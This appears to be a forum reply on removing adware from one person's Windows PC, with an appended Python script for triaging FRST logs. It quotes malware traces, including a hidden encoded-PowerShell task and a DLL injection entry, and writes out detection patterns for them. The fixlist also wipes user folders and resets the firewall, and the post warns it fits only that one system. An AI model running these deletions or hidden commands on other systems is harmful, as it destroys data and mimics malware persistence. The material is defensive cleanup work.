
Infected computer, Chinese program in startup



The Chinese object in startup is Tencent, but it is not the only problem in the system; there are many other adware objects. Actions to carry out:

 

1. Open Notepad and paste into it:

 

CloseProcesses:
CreateRestorePoint:
R2 Airtostrong; C:\ProgramData\\Airtostrong\\Airtostrong.exe [540160 2016-01-22] () [brak podpisu cyfrowego]
R2 aotech; C:\Program Files\aotech\aotech.exe [383488 2016-01-22] () [brak podpisu cyfrowego]
HKLM-x32\...\Run: [pcmgr] => C:\Program Files (x86)\ppt\Uninst.exe [1571296 2015-12-28] (Tencent)
AppInit_DLLs: C:\ProgramData\Airtostrong\Lacof.dll => C:\ProgramData\Airtostrong\Lacof.dll [805376 2016-01-22] ()
AppInit_DLLs-x32: C:\ProgramData\Airtostrong\Physsoft.dll => C:\ProgramData\Airtostrong\Physsoft.dll [257536 2016-01-22] ()
Task: {007A3879-EAB9-4943-B2FB-7E8706926C49} - System32\Tasks\{0E0D7A47-0C0A-7E0E-0D11-0D7A790B117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand [...]
Task: {033D7092-DE1C-4454-89AA-05A8083DE391} - System32\Tasks\{8E1133A2-01F8-4C42-A469-ACE6E7289288} => D:\Program Files (x86)\Origin Games\The Sims 2 Ultimate Collection\Fun with Pets\SP9\TSBin\Sims2EP9.exe
Task: {052D957C-7E11-484F-B4F5-8B8C8E33F91B} - System32\Tasks\{78DE3BA1-3E3E-4E4F-B9E2-074B0F2AB339} => D:\Błażeja\Train Simulator 2014\Train Simulator 2014\RailWorks.exe
Task: {0F293F1A-D194-4867-884A-69C59320430E} - System32\Tasks\{EAC553F1-D08B-4925-A3BA-BCC809D59478} => pcalua.exe -a C:\Users\user\Downloads\LeagueofLegends_EUNE_Installer_9_15_2014.exe -d C:\Windows\SysWOW64 -c /groupsextract:100;101;102; /out:"C:\Users\user\AppData\Roaming\Riot Games\League of Legends\prerequisites" /callbackid:3600
Task: {0FD9D867-2DCB-45DE-B381-5EE9D74B70CC} - System32\Tasks\{02CF3B8C-FC72-41D4-A477-B0E779055772} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Nero\Nero ProductInstaller 4\SetupX.exe" -c REMOVESERIALNUMBER="2M0K-K085-4W59-U5LW-585P-W083-MM85-1Z8L-257X-66XA-TC3T-K1M8-3204-2A2C-5T2C-2408-4W3C-6482"
Task: {12362DC9-80F7-454D-88B5-B9AE7BF1A0D9} - System32\Tasks\{519DC9CF-B253-4BD0-B1F9-FD29076769A0} => D:\Błażeja\Train Simulator 2014\Train Simulator 2014\RailWorks.exe
Task: {18FC7AF2-23FA-421B-8D10-B8410B6D106B} - System32\Tasks\{CE59F049-6A9A-40D0-A419-101C5279A3E8} => D:\Błażeja\he\SETUP.EXE
Task: {1C9EB64E-2395-4012-A3AE-891725717DC2} - System32\Tasks\psv_Tris-Dox => /c regedit.exe /s "C:\ProgramData\Airtostrong\Singlecore.reg" & del "C:\ProgramData\Airtostrong\Singlecore.reg" & SCHTASKS /Delete /TN "psv_Tris-Dox" /F 
Task: {1DC84E54-D157-490D-AC72-F75C537E6BA4} - System32\Tasks\{49E5CEBB-0AC0-4545-8049-2DC3D607DB49} => D:\Błażeja\gierka\TIM.EXE
Task: {1F19FAB0-9744-4D28-B9D6-D70EC9C60A4B} - System32\Tasks\{00937042-8571-41D1-91B3-1BF34C315046} => D:\Błażeja\he\AUTORUN.EXE
Task: {2D4AD31C-2F75-4981-A669-D85B9CD38C9C} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe
Task: {2FF1D73B-8B12-4451-9BF3-77F17B69B2F8} - System32\Tasks\{4078D993-C425-43E0-B6D2-F2C764BEBA6E} => D:\Błażeja\gierka\TIM.EXE
Task: {33A26768-362D-4636-A891-3C6F51CAD3A9} - System32\Tasks\{DDE0E411-176D-42DB-B937-2F1D0D525894} => D:\Błażeja\he\AUTORUN.EXE
Task: {38656597-0E88-4EA0-A313-D3CC04614FBF} - System32\Tasks\{A5653670-E66C-4620-9E53-C5083B1D3D0F} => D:\Błażeja\he\SETUP.EXE
Task: {3BBB8B2E-23DD-48E6-89C3-D2528CFEC3F4} - System32\Tasks\{716F639A-0CFA-418F-9ED1-0C89FCF2896B} => D:\Błażeja\he\SETUP.EXE
Task: {3F170444-D39E-4815-A23E-C28450A111E5} - System32\Tasks\{2B23447A-19FF-4564-80BC-69963AD32D3C} => D:\Błażeja\he\SETUP.EXE
Task: {462515AA-E6DB-4AE8-8885-9C5087262D81} - System32\Tasks\Uninstaller_SkipUac_user => C:\Program Files (x86)\IObit\IObit Uninstaller\IObitUninstaler.exe
Task: {4D59D784-CB25-4CE4-9E69-78B620DB2F8D} - System32\Tasks\{2A750497-0662-416E-8208-08F54D1BEEB0} => D:\Błażeja\he\SETUP.EXE
Task: {4DD34D73-43B0-441C-B82C-C9F291C8E22A} - System32\Tasks\{A92665E4-6694-467B-8348-43309181A29E} => D:\Błażeja\he\AUTORUN.EXE
Task: {535CAE96-43DC-4861-B6BA-A61B6185029B} - System32\Tasks\{C77AEC94-F164-4E56-B715-0D9FE27BFF2F} => pcalua.exe -a C:\Users\user\AppData\Roaming\omiga-plus\UninstallManager.exe -c -ptid=cor 
Task: {5861F754-0176-4932-8E6E-B050E9A7C35B} - System32\Tasks\{81879AD0-2A8F-483E-8444-17020348989C} => D:\Błażeja\gierka\TIM.EXE
Task: {5C970B67-F462-4D2C-A5A9-EECD5965E396} - System32\Tasks\{3DD5513E-4AF7-47A9-9966-479B510D0368} => D:\Błażeja\he\AUTORUN.EXE
Task: {610828BC-D12B-47E7-BEDF-C20AC7B0D8B6} - System32\Tasks\{8638CA79-DC3A-4F4E-8A26-E35044F64681} => D:\Błażeja\he\AUTORUN.EXE
Task: {6DA32D7C-A60D-4FC7-91B4-F1EF68C02341} - System32\Tasks\{4BE4FF64-67A0-49CB-94C5-03E755B74274} => D:\Błażeja\gierka\TIM.EXE
Task: {7580E58E-C2B4-40B7-8C7D-09A268F2A7D2} - System32\Tasks\{0F4A0214-465E-447D-9241-A288AD32BC9C} => D:\Program Files (x86)\Origin Games\The Sims 2 Ultimate Collection\Fun with Pets\SP9\TSBin\Sims2EP9.exe
Task: {7B507388-861C-4C2A-A080-D964541BAE90} - System32\Tasks\PPTAssistantNotifyTask_user => C:\Users\user\AppData\Local\PPTAssist\notify.exe
Task: {863B16B7-5E0A-48B2-B8D7-8A94A0F63627} - System32\Tasks\{5931D4C6-5DC0-4BE8-996C-FA9E0B647C66} => D:\Błażeja\gierka\TIM.EXE
Task: {8BA60223-B239-4B65-9381-2138CC8E377D} - System32\Tasks\{34D26411-AD68-43FD-A503-42E123F92315} => C:\Users\user\Downloads\D3DGearSetup.exe
Task: {8BB056F5-A2EC-47DD-9908-00465ECAB8AF} - System32\Tasks\Puukcog => C:\PROGRA~1\GROOVE~1\Fafrihn.bat
Task: {9AD398C6-4820-40AF-8730-166334D654F3} - System32\Tasks\{BF2C238E-8706-4B71-AD5F-B1151EB43B06} => D:\Błażeja\gierka\TIM.EXE
Task: {9D3F70F8-7F7C-4F8B-8507-F11BF0866D79} - System32\Tasks\{267EE13B-3EFF-4465-9B3B-CB49BF93F09F} => D:\Błażeja\gierka\TIM.EXE
Task: {9ECCC56B-6FC2-4E6A-84C3-6F0407449E56} - System32\Tasks\Game_Booster_AutoUpdate => D:\gameboster\Game Booster 3\AutoUpdate.exe
Task: {A14BF404-0C80-4360-A7A5-458313A385C8} - System32\Tasks\{DBBE9970-1FF1-4065-8083-20ED299C83AC} => D:\Błażeja\he\SETUP.EXE
Task: {A496219A-5628-4E3A-A3F7-262E0CAE63BE} - System32\Tasks\Driver Booster SkipUAC (user) => C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
Task: {A857AC0B-FD34-467A-B956-88CB8B1BE5B6} - System32\Tasks\{49063295-09C4-4E9D-AC83-BDEFBA180313} => D:\Błażeja\he\AUTORUN.EXE
Task: {B385E1D8-0DA3-44CA-A3D0-B92A3DFEC11A} - System32\Tasks\{CF8B4506-4BCA-4F56-86BA-32AC09EB36E7} => D:\Błażeja\gierka\TIM.EXE
Task: {C2961999-8D00-4C90-8E81-3DD57F813842} - System32\Tasks\{733EED1B-27F9-4D04-84EE-6A4959F0BB72} => D:\Błażeja\he\SETUP.EXE
Task: {CFDDF107-8609-408E-944D-80011FE0CC4C} - System32\Tasks\{5A7F4286-7082-4658-988D-19348134264C} => D:\Błażeja\he\AUTORUN.EXE
Task: {D74BA335-34EE-4381-A3A9-7D722EBAD5DE} - System32\Tasks\Trojan Killer => C:\Program Files\GridinSoft Trojan Killer\trojankiller.exe
Task: {DAC8805B-BDCF-4F34-9424-D1FD4AB9D0F9} - System32\Tasks\{5B62EAED-56C6-43FD-8FF4-2647A16BFEA3} => D:\Błażeja\he\AUTORUN.EXE
Task: {E4194451-868B-48A4-8C42-682838A8B668} - System32\Tasks\PPTAssistantUpdateTask_user => C:\Users\user\AppData\Local\PPTAssist\assistupdate.exe
Task: {EBA2728B-F677-45D8-925E-1391D2A291D9} - System32\Tasks\{649894F5-95BE-4C16-8715-E67386C75B82} => D:\Błażeja\Train Simulator 2014\Train Simulator 2014\RailWorks.exe
Task: {F60DEB4F-3306-4187-B73C-65A9155DA8CD} - \Program aktualizacji online firmy Adobe. -> Brak pliku 
Task: {F9E871FF-DBF5-4821-8487-53778FBFDEB9} - System32\Tasks\{93B98DB1-4456-4A58-9BBA-D101380B94AF} => D:\Błażeja\he\SETUP.EXE
U5 AppMgmt; C:\Windows\system32\svchost.exe [27136 2009-07-14] (Microsoft Corporation)
S3 gdrv; Brak ImagePath
S3 MBAMSwissArmy; Brak ImagePath
S3 usbbus; Brak ImagePath
S3 UsbDiag; Brak ImagePath
S3 USBModem; Brak ImagePath
S3 WinRing0_1_2_0; Brak ImagePath
S3 X6va029; Brak ImagePath
S3 XFDriver64; Brak ImagePath
S1 {991f0439-0e5b-4201-a65a-dee4d52c99b8}Gw64; Brak ImagePath
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S1 {25bfebaa-8898-4bf4-8b6f-6b7db87f40f7}Gw64; system32\drivers\{25bfebaa-8898-4bf4-8b6f-6b7db87f40f7}Gw64.sys [X]
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => Brak pliku
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => Brak pliku
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => Brak pliku
GroupPolicy: Ograniczenia - Chrome 
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia 
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia 
HKU\S-1-5-21-2195696607-1004561068-2284675860-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia 
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617911&ResetID=130878280563065191&GUID=C2693E11-1A88-4C57-AF00-A69252726DAB
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.google.com
HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\S-1-5-21-2195696607-1004561068-2284675860-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
SearchScopes: HKLM-x32 -> {0191A6B0-1154-4C22-9182-23A95BBE92D9} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKU\S-1-5-21-2195696607-1004561068-2284675860-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKU\S-1-5-21-2195696607-1004561068-2284675860-1000 -> {0191A6B0-1154-4C22-9182-23A95BBE92D9} URL = hxxp://www.google.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-2195696607-1004561068-2284675860-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-2195696607-1004561068-2284675860-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
Toolbar: HKU\S-1-5-21-2195696607-1004561068-2284675860-1000 -> Brak nazwy - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - Brak pliku
CHR HKLM\...\Chrome\Extension: [jeaohhlajejodfjadcponpnjgkiikocn] - 
CHR HKLM\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - 
CHR HKU\S-1-5-21-2195696607-1004561068-2284675860-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [fkkcgfbgohboipdhliafmacjnhjbhmim] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ngpampappnmepgilojfohadhhmbhlaek] - 
CHR HomePage: Default -> msn.com/?pc=__PARAM__&ocid=__PARAM__DHP&osmkt=pl-pl
CHR DefaultSearchURL: Default -> hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRYSttY34mamef947lyuPOB2E6QjqkhGUTFbG3TDcHPXcZi2wJDROuM6HIYLtvb5wuzuFPdiccLRPqyfNMVujTKv4KKQI_t1PGJSRcJQn79oZyo2igbyrHm5AFDU5-2ZPOk0SNZ_lArGVqx9duzU6QCqkFxyd_VT3JDu8J2cBCV2MOqIJ&q={searchTerms}
CHR DefaultSearchKeyword: Default -> feed.sonic-search.com
CHR DefaultSuggestURL: Default -> hxxps://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command={searchTerms}
DeleteKey: HKCU\Software\1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1I
DeleteKey: HKCU\Software\dobreprogramy
DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains
DeleteKey: HKCU\Software\Mozilla
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\services\ACTION_SVC
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\LogMeIn Hamachi Ui
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\SBRegRebootCleaner
DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla
DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main
DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main
DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main
DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes
DeleteKey: HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes
DeleteKey: HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes
C:\Program Files\aotech
C:\Program Files (x86)\baidu
C:\Program Files (x86)\Lenovo
C:\Program Files (x86)\Opera
C:\Program Files (x86)\ppt
C:\Program Files (x86)\TData
C:\Program Files\Common Files\yuorxhac.exe
C:\Program Files\Common Files\oi2l4pal
C:\ProgramData\72b4b938-60b1-0
C:\ProgramData\72b4b938-64d3-1
C:\ProgramData\Airtostrong
C:\ProgramData\kingsoft
C:\ProgramData\TEMP
C:\tmp
C:\uninst
C:\Users\user\AppData\Local\subhex.dat
C:\Users\user\AppData\Local\subhex.exe.config
C:\Users\user\AppData\Local\AION
C:\Users\user\AppData\Local\CleanBrowserApp
C:\Users\user\AppData\Local\Lenovo
C:\Users\user\AppData\Local\Mozilla
C:\Users\user\AppData\Local\Opera Software
C:\Users\user\AppData\Local\PPTAssist
C:\Users\user\AppData\Local\Tempfolder
C:\Users\user\AppData\Roaming\*.*
C:\Users\user\AppData\Roaming\AION
C:\Users\user\AppData\Roaming\CleanBrowser
C:\Users\user\AppData\Roaming\HerlhFepkae
C:\Users\user\AppData\Roaming\kingsoft
C:\Users\user\AppData\Roaming\Mozilla
C:\Users\user\AppData\Roaming\NystBopgu
C:\Users\user\AppData\Roaming\Opera Software
C:\Users\user\AppData\Roaming\WarThunder
C:\Users\user\Desktop\Kornela\Continue installation .lnk
C:\Users\user\Desktop\Błażeja\LogMeIn Hamachi.lnk
C:\Users\user\Downloads\dsound.dll
C:\Windows\System32\Tasks\Lenovo
C:\Windows\system32\xhd
C:\Windows\SysWOW64\Number of results
CMD: netsh advfirewall reset
EmptyTemp:

 

Note for other readers: this script is unique, tailored solely to this system; please do not use it on your own systems.

 

Save the file as fixlist.txt and place it next to the FRST tool. Run FRST and click Fix. Wait patiently and do not interrupt it. When the Fix finishes, the system will be restarted. A fixlog.txt file will be created in the same directory FRST was run from.

 

2. Run the Microsoft tool: CLICK. Accept > Detect problems and let me select the fixes to apply > Uninstalling > select Metric Collection SDK 35 in the list > Next.

 

3. Clean Google Chrome:

  • Reset synchronization (if enabled): CLICK.
  • Settings > Extensions tab > uninstall MSN Homepage.
  • Settings > Settings tab > Show advanced settings > scroll to the very bottom and run the Reset settings option. Bookmarks and passwords will not be affected.
4. Repair the damaged special IE shortcut. Paste the path below into the Explorer address bar and press ENTER:

 

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools

 

Right-click the Internet Explorer (No Add-ons) shortcut located there > Properties > in the Target field, after the path "C:\Program Files\Internet Explorer\iexplore.exe", append two spaces and -extoff

 

6. Make a new FRST log using Scan, again with Addition, but this time without Shortcut. Also attach the fixlog.txt file.

Edited by picasso
The topic is being closed due to lack of a reply. //picasso
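
Added example (not part of the original post and not FRST's own code): a small Python triage pass over FRST-style log lines that flags the kinds of entries the fixlist above targets, namely a hidden PowerShell task with an encoded command, AppInit_DLLs loaded from ProgramData, an unsigned service, and a search URL whose host is hidden behind percent-escapes. The sample lines are constructed from entries shown above with long values replaced by PLACEHOLDER; the rule names and function names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample: shortened copies of entries from the fixlist above.
# PLACEHOLDER stands in for values that are elided or too long to repeat.
SAMPLE = r"""
R2 aotech; C:\Program Files\aotech\aotech.exe [383488 2016-01-22] () [brak podpisu cyfrowego]
AppInit_DLLs: C:\ProgramData\Airtostrong\Lacof.dll => C:\ProgramData\Airtostrong\Lacof.dll [805376 2016-01-22] ()
Task: {007A3879-EAB9-4943-B2FB-7E8706926C49} - System32\Tasks\{0E0D7A47-0C0A-7E0E-0D11-0D7A790B117A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand PLACEHOLDER
Task: {2D4AD31C-2F75-4981-A669-D85B9CD38C9C} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe
CHR DefaultSearchURL: Default -> hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=PLACEHOLDER&q={searchTerms}
CHR DefaultSuggestURL: Default -> hxxps://search.yahoo.com/sugg/chrome?output=fxjson
"""

RULES = [
    # Scheduled task that starts PowerShell with a hidden window and an encoded command.
    ("hidden-encoded-powershell",
     re.compile(r"^Task:.*powershell(\.exe)?\b(?=.*-windowstyle\s+hidden)(?=.*-enc)", re.I)),
    # DLL injected into every GUI process via AppInit_DLLs, loaded from ProgramData.
    ("appinit-dll-from-programdata",
     re.compile(r"^AppInit_DLLs(-x32)?:\s*C:\\ProgramData\\", re.I)),
    # Service/driver line that the Polish FRST output marks as "no digital signature".
    ("unsigned-service",
     re.compile(r"^[RSU]\d\s.*\[brak podpisu cyfrowego\]", re.I)),
]

def encoded_host(line):
    """Return the decoded host if a defanged URL hides its host behind %XX escapes."""
    m = re.search(r"hxxps?://([^/\s]+)", line, re.I)
    if m and "%" in m.group(1):
        return unquote(m.group(1))
    return None

def triage(text):
    """Return (rule, evidence) pairs for every suspicious line, in input order."""
    findings = []
    for line in filter(None, map(str.strip, text.splitlines())):
        for name, rx in RULES:
            if rx.search(line):
                findings.append((name, line[:60]))
        host = encoded_host(line)
        if host:
            findings.append(("percent-encoded-host", host))
    return findings

if __name__ == "__main__":
    for rule, evidence in triage(SAMPLE):
        print(f"{rule:30} {evidence}")
```

The decoded host equals the `CHR DefaultSearchKeyword` value in the fixlist, which is why the escaped form is worth normalising before comparing against allow or block lists.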